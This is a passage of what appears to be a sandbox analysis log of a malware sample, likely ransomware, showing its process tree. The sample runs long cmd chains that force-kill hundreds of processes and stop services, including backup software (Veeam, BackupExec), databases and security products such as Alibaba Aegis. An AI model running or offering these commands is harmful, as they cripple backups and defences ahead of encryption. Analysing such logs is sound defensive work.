    cmd /c "color e & @taskkill /IM BackupExec.exe /F & @taskkill /IM Att.exe /F & @taskkill /IM mdm.exe /F & @taskkill /IM BackupExecManagementService.exe /F & @taskkill /IM bengine.exe /F & @taskkill /IM benetns.exe /F & @taskkill /IM beserver.exe /F & @taskkill /IM pvlsvr.exe /F & @taskkill /IM bedbg.exe /F & @taskkill /IM beremote.exe /F & @taskkill /IM beremote.exe /F & @taskkill /IM beremote.exe /F & @taskkill /IM beremote.exe /F & @taskkill /IM RemoteAssistProcess.exe /F & @taskkill /IM BarMoniService.exe /F & @taskkill /IM GoodGameSrv.exe /F & @taskkill /IM BarCMService.exe /F & @taskkill /IM TsService.exe /F & @taskkill /IM GoodGame.exe /F & @taskkill /IM BarServerView.exe /F & @taskkill /IM IcafeServicesTray.exe /F & @taskkill /IM BsAgent_0.exe /F & @taskkill /IM ControlServer.exe /F & @taskkill /IM DisklessServer.exe /F & @taskkill /IM DumpServer.exe /F & @taskkill /IM NetDiskServer.exe /F & @taskkill /IM PersonUDisk.exe /F & @taskkill /IM service_agent.exe /F & @taskkill /IM SoftMemory.exe /F & @taskkill /IM BarServer.exe /F & @taskkill /IM RtkNGUI64.exe /F & @taskkill /IM Serv-U-Tray.exe /F & @taskkill /IM QQPCSoftTrayTips.exe /F & @taskkill /IM SohuNews.exe /F & @taskkill /IM Serv-U.exe /F & @taskkill /IM QQPCRTP.exe /F & @taskkill /IM EasyFZS.exe /F & @taskkill /IM HaoYiShi.exe /F & @taskkill /IM HysMySQL.exe /F & @taskkill /IM wtautoreg.exe /F & @taskkill /IM ispiritPro.exe /F & @taskkill /IM CAService.exe /F & @taskkill /IM XAssistant.exe /F & @taskkill /IM TrustCA.exe /F & @taskkill /IM GEUU20003.exe /F & @taskkill /IM CertMgr.exe /F & @taskkill /IM eSafe_monitor.exe /F & @taskkill /IM MainExecute.exe /F & @taskkill /IM FastInvoice.exe /F & @taskkill /IM SoftMgrLite.exe /F & @taskkill /IM sesvc.exe /F & @taskkill /IM ScanFileServer.exe /F & @taskkill /IM Nuoadehgcgcd.exe /F & @taskkill /IM OpenFastAssist.exe /F & @taskkill /IM FastInvoiceAssist.exe /F & @taskkill /IM Nuoadfaggcje.exe /F & @taskkill /IM OfficeUpdate.exe /F & @taskkill /IM atkexComSvc.exe /F & @taskkill /IM FileTransferAgent.exe /F & @taskkill /IM MasterReplicatorAgent.exe /F & @taskkill /IM CrmAsyncService.exe /F & @taskkill /IM CrmAsyncService.exe /F & @taskkill /IM CrmUnzipService.exe /F & @taskkill /IM NscAuthService.exe /F & @taskkill /IM ReplicaReplicatorAgent.exe /F & @taskkill /IM ASMCUSvc.exe /F & @taskkill /IM OcsAppServerHost.exe /F & @taskkill /IM RtcCdr.exe /F & @taskkill /IM IMMCUSvc.exe /F & @taskkill /IM DataMCUSvc.exe /F & @taskkill /IM MeetingMCUSvc.exe /F & @taskkill /IM QmsSvc.exe /F & @taskkill /IM RTCSrv.exe /F & @taskkill /IM pnopagw.exe /F & @taskkill /IM NscAuth.exe /F & @taskkill /IM Microsoft.ActiveDirectory.WebServices.exe /F & @taskkill /IM DistributedCacheService.exe /F & @taskkill /IM c2wtshost.exe /F & @taskkill /IM Microsoft.Office.Project.Server.Calculation.exe /F & @taskkill /IM schedengine.exe /F & @taskkill /IM Microsoft.Office.Project.Server.Eventing.exe /F & @taskkill /IM Microsoft.Office.Project.Server.Queuing.exe /F & @taskkill /IM WSSADMIN.EXE /F & @taskkill /IM hostcontrollerservice.exe /F & @taskkill /IM noderunner.exe /F & @taskkill /IM OWSTIMER.EXE /F & @taskkill /IM wsstracing.exe /F & @taskkill /IM mssearch.exe /F & @taskkill /IM MySQLInstallerConsole.exe /F & @taskkill /IM EXCEL.EXE /F & @taskkill /IM consent.exe /F & @taskkill /IM RtkAudioService64.exe /F & @taskkill /IM RAVBg64.exe /F & @taskkill /IM FNPLicensingService64.exe /F & @taskkill /IM VisualSVNServer.exe /F & @taskkill /IM MotionBoard57.exe /F & @taskkill /IM MotionBoardRCService57.exe /F & @taskkill /IM LPManService.exe /F & @taskkill /IM RaRegistry.exe /F & @taskkill /IM RaAutoInstSrv.exe /F & @taskkill /IM RtHDVCpl.exe /F & @taskkill /IM DefenderDaemon.exe /F & @taskkill /IM BestSyncApp.exe /F & @taskkill /IM ApUI.exe /F & @taskkill /IM AutoUpdate.exe /F & @taskkill /IM LPManNotifier.exe /F & @taskkill /IM FieldAnalyst.exe /F & @taskkill /IM TimingGenerate.exe /F & @taskkill /IM Detector.exe /F & @taskkill /IM Estimator.exe /F & @taskkill /IM FA_Logwriter.exe /F & @taskkill /IM TrackingSrv.exe /F & @taskkill /IM cbInterface.exe /F & @taskkill /IM EnterprisePortal.exe /F & @taskkill /IM ccbService.exe /F & @taskkill /IM monitor.exe /F & @taskkill /IM U8DispatchService.exe /F & @taskkill /IM dbsrv16.exe /F & @taskkill /IM sqlservr.exe /F & @taskkill /IM KICManager.exe /F & @taskkill /IM KICMain.exe /F & @taskkill /IM ServerManagerLauncher.exe /F & @taskkill /IM TbossGate.exe /F & @taskkill /IM iusb3mon.exe /F & @taskkill /IM MgrEnvSvc.exe /F & @taskkill /IM Mysoft.Config.WindowsService.exe /F & @taskkill /IM Mysoft.UpgradeService.UpdateService.exe /F & @taskkill /IM hasplms.exe /F & @taskkill /IM Mysoft.Setup.InstallService.exe /F & @taskkill /IM Mysoft.UpgradeService.Dispatcher.exe /F & @taskkill /IM Mysoft.DataCenterService.WindowsHost.exe /F & @taskkill /IM Mysoft.DataCenterService.DataCleaning.exe /F & @taskkill /IM Mysoft.DataCenterService.DataTracking.exe /F & @taskkill /IM Mysoft.SchedulingService.WindowsHost.exe /F & @taskkill /IM ServiceMonitor.exe /F & @taskkill /IM Mysoft.SchedulingService.ExecuteEngine.exe /F & @taskkill /IM AgentX.exe /F & @taskkill /IM host.exe /F & @taskkill /IM AutoUpdate.exe /F & @taskkill /IM vsjitdebugger.exe /F"
    3⤵
    PID:2156
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM mdm.exe /F
      4⤵
      Kills process with taskkill
      PID:2364
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM BackupExecManagementService.exe /F
      4⤵
      Kills process with taskkill
      PID:768
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM bengine.exe /F
      4⤵
      Kills process with taskkill
      PID:2748
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c "color e & @taskkill /IM pg_ctl.exe /F & @taskkill /IM rcrelay.exe /F & @taskkill /IM SogouImeBroker.exe /F & @taskkill /IM CCenter.exe /F & @taskkill /IM ScanFrm.exe /F & @taskkill /IM d_manage.exe /F & @taskkill /IM RsTray.exe /F & @taskkill /IM wampmanager.exe /F & @taskkill /IM RavTray.exe /F & @taskkill /IM mssearch.exe /F & @taskkill /IM sqlmangr.exe /F & @taskkill /IM msftesql.exe /F & @taskkill /IM SyncBaseSvr.exe /F & @taskkill /IM oracle.exe /F & @taskkill /IM TNSLSNR.exe /F & @taskkill /IM SyncBaseConsole.exe /F & @taskkill /IM aspnet_state.exe /F & @taskkill /IM AutoBackUpEx.exe /F & @taskkill /IM redis-server.exe /F & @taskkill /IM MySQLNotifier.exe /F & @taskkill /IM oravssw.exe /F & @taskkill /IM fppdis5.exe /F & @taskkill /IM His6Service.exe /F & @taskkill /IM dinotify.exe /F & @taskkill /IM JhTask.exe /F & @taskkill /IM Executer.exe /F & @taskkill /IM AllPassCBHost.exe /F & @taskkill /IM ap_nginx.exe /F & @taskkill /IM AndroidServer.exe /F & @taskkill /IM XT.exe /F & @taskkill /IM XTService.exe /F & @taskkill /IM AllPassMCService.exe /F & @taskkill /IM IMEDICTUPDATE.exe /F & @taskkill /IM FlashHelperService.exe /F & @taskkill /IM ap_redis-server.exe /F & @taskkill /IM UtilDev.WebServer.Monitor.exe /F & @taskkill /IM UWS.AppHost.Clr2.x86.exe /F & @taskkill /IM FoxitProtect.exe /F & @taskkill /IM ftnlses.exe /F & @taskkill /IM ftusbrdwks.exe /F & @taskkill /IM ftusbrdsrv.exe /F & @taskkill /IM ftnlsv.exe /F & @taskkill /IM Syslogd_Service.exe /F & @taskkill /IM UWS.HighPrivilegeUtilities.exe /F & @taskkill /IM ftusbsrv.exe /F & @taskkill /IM UWS.LowPrivilegeUtilities.exe /F & @taskkill /IM UWS.AppHost.Clr2.AnyCpu.exe /F & @taskkill /IM winguard_x64.exe /F & @taskkill /IM vmconnect.exe /F & @taskkill /IM UWS.AppHost.Clr2.x86.exe /F & @taskkill /IM firefox.exe /F & @taskkill /IM usbrdsrv.exe /F & @taskkill /IM usbserver.exe /F & @taskkill /IM Foxmail.exe /F & @taskkill /IM qemu-ga.exe /F & @taskkill /IM wwbizsrv.exe /F & @taskkill /IM ZTEFileTranS.exe /F & @taskkill /IM ZTEUsbIpc.exe /F & @taskkill /IM ZTEUsbIpcGuard.exe /F & @taskkill /IM AlibabaProtect.exe /F & @taskkill /IM kbasesrv.exe /F & @taskkill /IM ZTEVdservice.exe /F & @taskkill /IM MMRHookService.exe /F & @taskkill /IM extjob.exe /F & @taskkill /IM IpOverUsbSvc.exe /F & @taskkill /IM VMwareTray.exe /F & @taskkill /IM devenv.exe /F & @taskkill /IM PerfWatson2.exe /F & @taskkill /IM ServiceHub.Host.Node.x86.exe /F & @taskkill /IM ServiceHub.IdentityHost.exe /F & @taskkill /IM ServiceHub.VSDetouredHost.exe /F & @taskkill /IM ServiceHub.SettingsHost.exe /F & @taskkill /IM ServiceHub.Host.CLR.x86.exe /F & @taskkill /IM ServiceHub.RoslynCodeAnalysisService32.exe /F & @taskkill /IM ServiceHub.DataWarehouseHost.exe /F & @taskkill /IM Microsoft.VisualStudio.Web.Host.exe /F & @taskkill /IM SQLEXPRWT.exe /F & @taskkill /IM setup.exe /F & @taskkill /IM remote.exe /F & @taskkill /IM setup100.exe /F & @taskkill /IM landingpage.exe /F & @taskkill /IM WINWORD.exe /F & @taskkill /IM KuaiYun.exe /F & @taskkill /IM HwsHostPanel.exe /F & @taskkill /IM NovelSpider.exe /F & @taskkill /IM Service_KMS.exe /F & @taskkill /IM WebServer.exe /F & @taskkill /IM ChsIME.exe /F & @taskkill /IM btPanel.exe /F & @taskkill /IM Protect_2345Explorer.exe /F & @taskkill /IM Pic_2345Svc.exe /F & @taskkill /IM vmware-converter-a.exe /F & @taskkill /IM vmware-converter.exe /F & @taskkill /IM vmware.exe /F & @taskkill /IM vmware-unity-helper.exe /F & @taskkill /IM vmware-vmx.exe /F & @taskkill /IM vmware-vmx.exe /F & @taskkill /IM usysdiag.exe /F & @taskkill /IM PopBlock.exe /F & @taskkill /IM gsinterface.exe /F & @taskkill /IM Gemstar.Group.CRS.Client.exe /F & @taskkill /IM TenpayServer.exe /F & @taskkill /IM RemoteExecService.exe /F & @taskkill /IM VS_TrueCorsManager.exe /F & @taskkill /IM ntpsvr-2019-01-22-wgs84.exe /F & @taskkill /IM rtkjob-ion.exe /F & @taskkill /IM ntpsvr-2019-01-22-no-usrcheck.exe /F & @taskkill /IM NtripCaster-2019-01-08.exe /F & @taskkill /IM BACSTray.exe /F & @taskkill /IM protect.exe /F & @taskkill /IM hfs.exe /F & @taskkill /IM jzmis.exe /F & @taskkill /IM NewFileTime_x64.exe /F & @taskkill /IM 2345MiniPage.exe /F & @taskkill /IM JMJ_server.exe /F & @taskkill /IM cacls.exe /F & @taskkill /IM gpsdaemon.exe /F & @taskkill /IM gpsusersvr.exe /F & @taskkill /IM gpsdownsvr.exe /F & @taskkill /IM gpsstoragesvr.exe /F & @taskkill /IM gpsdataprocsvr.exe /F & @taskkill /IM gpsftpd.exe /F & @taskkill /IM gpsmysqld.exe /F & @taskkill /IM gpstomcat6.exe /F & @taskkill /IM gpsloginsvr.exe /F & @taskkill /IM gpsmediasvr.exe /F & @taskkill /IM gpsgatewaysvr.exe /F & @taskkill /IM gpssvrctrl.exe /F & @taskkill /IM zabbix_agentd.exe /F"
    3⤵
    PID:1484
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c "color e & @taskkill /IM ThunderPlatform.exe /F & @taskkill /IM iexplore.exe /F & @taskkill /IM vm-agent.exe /F & @taskkill /IM vm-agent-daemon.exe /F & @taskkill /IM eSightService.exe /F & @taskkill /IM cygrunsrv.exe /F & @taskkill /IM wrapper.exe /F & @taskkill /IM nginx.exe /F & @taskkill /IM node.exe /F & @taskkill /IM sshd.exe /F & @taskkill /IM vm-tray.exe /F & @taskkill /IM iempwatchdog.exe /F & @taskkill /IM sqlwriter.exe /F & @taskkill /IM php.exe /F & @taskkill /IM "notepad++.exe" /F & @taskkill /IM "phpStudy.exe" /F & @taskkill /IM OPCClient.exe /F & @taskkill /IM navicat.exe /F & @taskkill /IM SupportAssistAgent.exe /F & @taskkill /IM SunloginClient.exe /F & @taskkill /IM SOUNDMAN.exe /F & @taskkill /IM WeChat.exe /F & @taskkill /IM TXPlatform.exe /F & @taskkill /IM Tencentdll.exe /F & @taskkill /IM httpd.exe /F & @taskkill /IM jenkins.exe /F & @taskkill /IM QQ.exe /F & @taskkill /IM HaoZip.exe /F & @taskkill /IM HaoZipScan.exe /F & @taskkill /IM navicat.exe /F & @taskkill /IM TSVNCache.exe /F & @taskkill /IM RAVCpl64.exe /F & @taskkill /IM secbizsrv.exe /F & @taskkill /IM aliwssv.exe /F & @taskkill /IM Helper_Haozip.exe /F & @taskkill /IM acrotray.exe /F & @taskkill /IM "FileZilla Server Interface.exe" /F & @taskkill /IM YoudaoNote.exe /F & @taskkill /IM YNoteCefRender.exe /F & @taskkill /IM idea.exe /F & @taskkill /IM fsnotifier.exe /F & @taskkill /IM picpick.exe /F & @taskkill /IM lantern.exe /F & @taskkill /IM sysproxy-cmd.exe /F & @taskkill /IM service.exe /F & @taskkill /IM pcas.exe /F & @taskkill /IM PresentationFontCache.exe /F & @taskkill /IM RtWlan.exe /F & @taskkill /IM monitor.exe /F & @taskkill /IM Correspond.exe /F & @taskkill /IM ChatServer.exe /F & @taskkill /IM InetMgr.exe /F & @taskkill /IM LogonServer.exe /F & @taskkill /IM GameServer.exe /F & @taskkill /IM ServUAdmin.exe /F & @taskkill /IM ServUDaemon.exe /F & @taskkill /IM update0.exe /F & @taskkill /IM server.exe /F & @taskkill /IM w3wp.exe /F & @taskkill /IM notepad.exe /F & @taskkill /IM PalmInputService.exe /F & @taskkill /IM PalmInputGuard.exe /F & @taskkill /IM UpdateServer.exe /F & @taskkill /IM UpdateGate.exe /F & @taskkill /IM DBServer.exe /F & @taskkill /IM LoginGate.exe /F & @taskkill /IM SelGate.exe /F & @taskkill /IM RunGate.exe /F & @taskkill /IM M2Server.exe /F & @taskkill /IM LogDataServer.exe /F & @taskkill /IM LoginSrv.exe /F & @taskkill /IM sqlceip.exe /F & @taskkill /IM mqsvc.exe /F & @taskkill /IM RefundOrder.exe /F & @taskkill /IM ClamTray.exe /F & @taskkill /IM AdobeARM.exe /F & @taskkill /IM veeam.backup.shell.exe /F & @taskkill /IM VpxClient.exe /F & @taskkill /IM vmware-vmrc.exe /F & @taskkill /IM DSCPatchService.exe /F & @taskkill /IM scktsrvr.exe /F & @taskkill /IM ServerManager.exe /F & @taskkill /IM Dispatcher.exe /F & @taskkill /IM EFDispatcher.exe /F & @taskkill /IM sqlceip.exe /F & @taskkill /IM mqsvc.exe /F & @taskkill /IM RefundOrder.exe /F & @taskkill /IM ClamTray.exe /F & @taskkill /IM AdobeARM.exe /F & @taskkill /IM veeam.backup.shell.exe /F & @taskkill /IM VpxClient.exe /F & @taskkill /IM vmware-vmrc.exe /F & @taskkill /IM DSCPatchService.exe /F & @taskkill /IM scktsrvr.exe /F & @taskkill /IM ServerManager.exe /F & @taskkill /IM Dispatcher.exe /F & @taskkill /IM EFDispatcher.exe /F & @taskkill /IM ClamWin.exe /F & @taskkill /IM srvany.exe /F & @taskkill /IM JT_AG-8332.exe /F & @taskkill /IM XXTClient.exe /F & @taskkill /IM clean.exe /F & @taskkill /IM sqlservr.exe /F & @taskkill /IM "Net.Service.exe" /F & @taskkill /IM plsqldev.exe /F & @taskkill /IM splwow64.exe /F & @taskkill /IM Oobe.exe /F & @taskkill /IM QQYService.exe /F & @taskkill /IM sqlservr.exe /F & @taskkill /IM SGTool.exe /F & @taskkill /IM postgres.exe /F & @taskkill /IM AppVShNotify.exe /F & @taskkill /IM OfficeClickToRun.exe /F & @taskkill /IM EntDT.exe /F & @taskkill /IM EntPublish.exe /F"
    3⤵
    PID:1224
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM vm-agent.exe /F
      4⤵
      Kills process with taskkill
      PID:1632
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop "MSOLAP$SHOPCONTROL9"
      4⤵
      PID:2004
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM vm-agent-daemon.exe /F
      4⤵
      Kills process with taskkill
      PID:1056
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c "color e & @taskkill /IM sqlservr.exe /F & @taskkill /IM httpd.exe /F & @taskkill /IM java.exe /F & @taskkill /IM fdhost.exe /F & @taskkill /IM fdlauncher.exe /F & @taskkill /IM Veeam.Backup.Service.exe /F & @taskkill /IM reportingservicesservice.exe /F & @taskkill /IM softmgrlite.exe /F & @taskkill /IM sqlbrowser.exe /F & @taskkill /IM ssms.exe /F & @taskkill /IM vmtoolsd.exe /F & @taskkill /IM baidunetdisk.exe /F & @taskkill /IM yundetectservice.exe /F & @taskkill /IM ssclient.exe /F & @taskkill /IM GNAupdaemon.exe /F & @taskkill /IM RAVCp164.exe /F & @taskkill /IM igfxEM.exe /F & @taskkill /IM igfxHK.exe /F & @taskkill /IM igfxTray.exe /F & @taskkill /IM 360bdoctor.exe /F & @taskkill /IM GNCEFExternal.exe /F & @taskkill /IM PrivacyIconClient.exe /F & @taskkill /IM UIODetect.exe /F & @taskkill /IM AutoDealService.exe /F & @taskkill /IM IDDAService.exe /F & @taskkill /IM EnergyDataService.exe /F & @taskkill /IM MPService.exe /F & @taskkill /IM TransMain.exe /F & @taskkill /IM DAService.exe /F & @taskkill /IM GoogleCrashHandler.exe /F & @taskkill /IM GoogleCrashHandler64.exe /F & @taskkill /IM GoogleUpdate.exe /F & @taskkill /IM cohernece.exe /F & @taskkill /IM vmware-tray.exe /F & @taskkill /IM MsDtsSrvr.exe /F & @taskkill /IM msmdsrv.exe /F & @taskkill /IM "FileZilla server.exe" /F & @taskkill /IM UpdateData.exe /F & @taskkill /IM WebApi.Host.exe /F & @taskkill /IM VGAuthService.exe /F & @taskkill /IM omtsreco.exe /F & @taskkill /IM TNSLSNR.exe /F & @taskkill /IM oracle.exe /F & @taskkill /IM msdtc.exe /F & @taskkill /IM mmc.exe /F & @taskkill /IM emagent.exe /F & @taskkill /IM SoftMgrLite.exe /F & @taskkill /IM UIODetect.exe /F & @taskkill /IM AutoDealService.exe /F & @taskkill /IM Admin.exe /F & @taskkill /IM IDDAService.exe /F & @taskkill /IM EnergyDataService.exe /F & @taskkill /IM EnterprisePortal.exe /F & @taskkill /IM MPService.exe /F & @taskkill /IM TransMain.exe /F & @taskkill /IM DAService.exe /F & @taskkill /IM tomcat7.exe /F & @taskkill /IM cohernece.exe /F & @taskkill /IM vmware-tray.exe /F & @taskkill /IM MsDtsSrvr.exe /F & @taskkill /IM Kingdee.K3.CRM.MMC.MMCService.exe /F & @taskkill /IM Kingdee.k3.Weixin.ClientService.exe /F & @taskkill /IM Kingdee.K3.PUBLIC.BkgSvcHost.exe /F & @taskkill /IM Kingdee.K3.HR.Server.exe /F & @taskkill /IM Kingdee.K3.PUBLIC.KDSvrMgrHost.exe /F & @taskkill /IM tomcat5.exe /F & @taskkill /IM Kingdee.DeskTool.exe /F & @taskkill /IM UserClient.exe /F & @taskkill /IM GNAupdaemon.exe /F & @taskkill /IM mysqld.exe /F & @taskkill /IM ImtsEventSvr.exe /F & @taskkill /IM mysqld-nt.exe /F & @taskkill /IM 360EnterpriseDiskUI.exe /F & @taskkill /IM msmdsrv.exe /F & @taskkill /IM UpdateData.exe /F & @taskkill /IM WebApi.Host.exe /F & @taskkill /IM VGAuthService.exe /F & @taskkill /IM omtsreco.exe /F & @taskkill /IM TNSLSNR.exe /F & @taskkill /IM oracle.exe /F & @taskkill /IM msdtc.exe /F & @taskkill /IM mmc.exe /F & @taskkill /IM emagent.exe /F & @taskkill /IM SoftMgrLite.exe /F & @taskkill /IM tomcat8.exe /F & @taskkill /IM QQprotect.exe /F & @taskkill /IM isqlplussvc.exe /F & @taskkill /IM nmesrvc.exe /F & @taskkill /IM mysqld.exe /F & @taskkill /IM jusched.exe /F & @taskkill /IM MtxHotPlugService.exe /F & @taskkill /IM jucheck.exe /F & @taskkill /IM wordpad.exe /F & @taskkill /IM SecureCRT.exe /F & @taskkill /IM chrome.exe /F & @taskkill /IM Thunder.exe /F"
    3⤵
    PID:1552
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM fdhost.exe /F
      4⤵
      Kills process with taskkill
      PID:1936
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM fdlauncher.exe /F
      4⤵
      Kills process with taskkill
      PID:2680
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c "color a & @net stop UIODetect & @net stop VMwareHostd & @net stop TeamViewer8 & @net stop VMUSBArbService & @net stop VMAuthdService & @net stop wanxiao-monitor & @net stop WebAttendServer & @net stop mysqltransport & @net stop VMnetDHCP & @net stop "VMware NAT Service" & @net stop Tomcat8 & @net stop TeamViewer & @net stop QPCore & @net stop CASLicenceServer & @net stop CASWebServer & @net stop AutoUpdateService & @net stop "Alibaba Security Aegis Detect Service" & @net stop "Alibaba Security Aegis Update Service" & @net stop "AliyunService" & @net stop CASXMLService & @net stop AGSService & @net stop RapService & @net stop DDNSService & @net stop iNethinkSQLBackupSvc & @net stop CASVirtualDiskService & @net stop CASMsgSrv & @net stop "OracleOraDb10g_homeliSQL*Plus" & @net stop OracleDBConsoleilas & @net stop MySQL & @net stop TPlusStdAppService1220 & @net stop TPlusStdTaskService1220 & @net stop TPlusStdUpgradeService1220 & @net stop K3MobileServiceManage & @net stop "FileZilla Server" & @net stop DDVRulesProcessor & @net stop ImtsEventSvr & @net stop AutoUpdatePatchService & @net stop OMAILREPORT & @net stop "Dell Hardware Support" & @net stop SupportAssistAgent & @net stop K3MMainSuspendService & @net stop KpService & @net stop ceng_web_svc_d & @net stop KugouService & @net stop pcas & @net stop U8SendMailAdmin & @net stop "Bonjour Service" & @net stop "Apple Mobile Device Service" & @net stop "ABBYY.Licensing.FineReader.Professional.12.0""
    3⤵
    PID:1156
  - - C:\Windows\SysWOW64\net.exe
      net stop QPCore
      4⤵
      PID:2864
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop QPCore
        5⤵
        
        PID:2336
  - - C:\Windows\SysWOW64\net.exe
      net stop CASLicenceServer
      4⤵
      PID:3032
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop CASLicenceServer
        5⤵
        
        PID:2836
  - - C:\Windows\SysWOW64\net.exe
      net stop CASWebServer
      4⤵
      PID:588
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop CASWebServer
        5⤵
        
        PID:2592
  - - C:\Windows\SysWOW64\net.exe
      net stop AutoUpdateService
      4⤵
      PID:672
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop AutoUpdateService
        5⤵
        
        PID:2560
  - - C:\Windows\SysWOW64\net.exe
      net stop "Alibaba Security Aegis Detect Service"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1656
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "Alibaba Security Aegis Detect Service"
        5⤵
        
        PID:2264
  - - C:\Windows\SysWOW64\net.exe
      net stop "Alibaba Security Aegis Update Service"
      4⤵
      PID:2436
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "Alibaba Security Aegis Update Service"
        5⤵
        
        PID:1384
  - - C:\Windows\SysWOW64\net.exe
      net stop "AliyunService"
      4⤵
      PID:2528
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "AliyunService"
        5⤵
        
        PID:2760
  - - C:\Windows\SysWOW64\net.exe
      net stop CASXMLService
      4⤵
      PID:2788
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop CASXMLService
        5⤵
        
        PID:2412
  - - C:\Windows\SysWOW64\net.exe
      net stop AGSService
      4⤵
      PID:1628
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop AGSService
        5⤵
        
        PID:748
  - - C:\Windows\SysWOW64\net.exe
      net stop RapService
      4⤵
      PID:2980
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop RapService
        5⤵
        
        PID:2224
  - - C:\Windows\SysWOW64\net.exe
      net stop DDNSService
      4⤵
      PID:3040
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop DDNSService
        5⤵
        
        PID:2360
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c "color a & @net stop HaoZipSvc & @net stop "igfxCUIService2.0.0.0" & @net stop Realtek11nSU & @net stop xenlite & @net stop XenSvc & @net stop Apache2.2 & @net stop "Synology Drive VSS Service x64" & @net stop DellDRLogSvc & @net stop FirebirdGuardianDeafaultInstance & @net stop JWEM3DBAUTORun & @net stop JWRinfoClientService & @net stop JWService & @net stop Service2 & @net stop RapidRecoveryAgent & @net stop FirebirdServerDefaultInstance & @net stop AdobeARMservice & @net stop VeeamCatalogSvc & @net stop VeeanBackupSvc & @net stop VeeamTransportSvc & @net stop TPlusStdAppService1300 & @net stop TPlusStdTaskService1300 & @net stop TPlusStdUpgradeService1300 & @net stop TPlusStdWebService1300 & @net stop VeeamNFSSvc & @net stop VeeamDeploySvc & @net stop VeeamCloudSvc & @net stop VeeamMountSvc & @net stop VeeamBrokerSvc & @net stop VeeamDistributionSvc & @net stop tmlisten & @net stop ServiceMid & @net stop 360EntPGSvc & @net stop ClickToRunSvc & @net stop RavTask & @net stop AngelOfDeath & @net stop d_safe & @net stop NFLicenceServer & @net stop "NetVault Process Manager" & @net stop RavService & @net stop DFServ & @net stop IngressMgr & @net stop EvtSys & @net stop K3ClouManager & @net stop NFVPrintServer & @net stop RTCAVMCU & @net stop CobianBackup10 & @net stop GNWebService & @net stop Mysoft.SchedulingService & @net stop AgentX & @net stop SentinelKeysServer & @net stop DGPNPSEV & @net stop TurboCRM70 & @net stop NFSysService & @net stop U8DispatchService & @net stop NFOTPService & @net stop U8EISService & @net stop U8EncryptService & @net stop U8GCService & @net stop U8KeyManagePool & @net stop U8MPool & @net stop U8SCMPool & @net stop U8SLReportService & @net stop U8TaskService & @net stop U8WebPool & @net stop UFAllNet & @net stop UFReportService & @net stop UTUService"
    3⤵
    PID:1520
  - - C:\Windows\SysWOW64\net.exe
      net stop AdobeARMservice
      4⤵
      PID:2732
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop AdobeARMservice
        5⤵
        
        PID:2484
  - - C:\Windows\SysWOW64\net.exe
      net stop VeeamCatalogSvc
      4⤵
      PID:2192
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop VeeamCatalogSvc
        5⤵
        
        PID:2496
  - - C:\Windows\SysWOW64\net.exe
      net stop VeeanBackupSvc
      4⤵
      PID:2908
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop VeeanBackupSvc
        5⤵
        
        PID:3024
  - - C:\Windows\SysWOW64\net.exe
      net stop VeeamTransportSvc
      4⤵
      PID:2272
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop VeeamTransportSvc
        5⤵
        
        PID:2920
  - - C:\Windows\SysWOW64\net.exe
      net stop TPlusStdAppService1300
      4⤵
      PID:1144
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop TPlusStdAppService1300
        5⤵
        
        PID:2996
  - - C:\Windows\SysWOW64\net.exe
      net stop TPlusStdTaskService1300
      4⤵
      PID:1740
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop TPlusStdTaskService1300
        5⤵
        
        PID:2404
  - - C:\Windows\SysWOW64\net.exe
      net stop TPlusStdUpgradeService1300
      4⤵
      PID:2768
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop TPlusStdUpgradeService1300
        5⤵
        
        PID:3064
  - - C:\Windows\SysWOW64\net.exe
      net stop TPlusStdWebService1300
      4⤵
      PID:2536
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop TPlusStdWebService1300
        5⤵
        
        PID:2560
  - - C:\Windows\SysWOW64\net.exe
      net stop VeeamNFSSvc
      4⤵
      PID:2948
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop VeeamNFSSvc
        5⤵
        
        PID:2708
- - C:\Windows\SysWOW64\cmd.exe
